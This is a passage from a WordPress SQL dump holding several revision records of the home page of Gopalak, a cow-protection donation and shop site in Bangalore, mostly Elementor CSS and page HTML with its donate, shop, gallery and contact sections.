.elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by <a href=\"https://themehunk.com/\" target=\"_blank\" rel=\"noopener\">Themehunk</a></p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:41:57','2022-10-28 07:11:57','',1373,'https://gopalak.in/?p=2023',0,'revision','',0),(2024,1,'2022-10-28 12:41:57','2022-10-28 07:11:57','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n																<a href=\"https://gopalak.in\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by <a href=\"https://themehunk.com/\" target=\"_blank\" rel=\"noopener\">Themehunk</a></p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 12:41:57','2022-10-28 07:11:57','',1373,'https://gopalak.in/?p=2024',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (2025,1,'2022-10-28 12:41:57','2022-10-28 07:11:57','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, 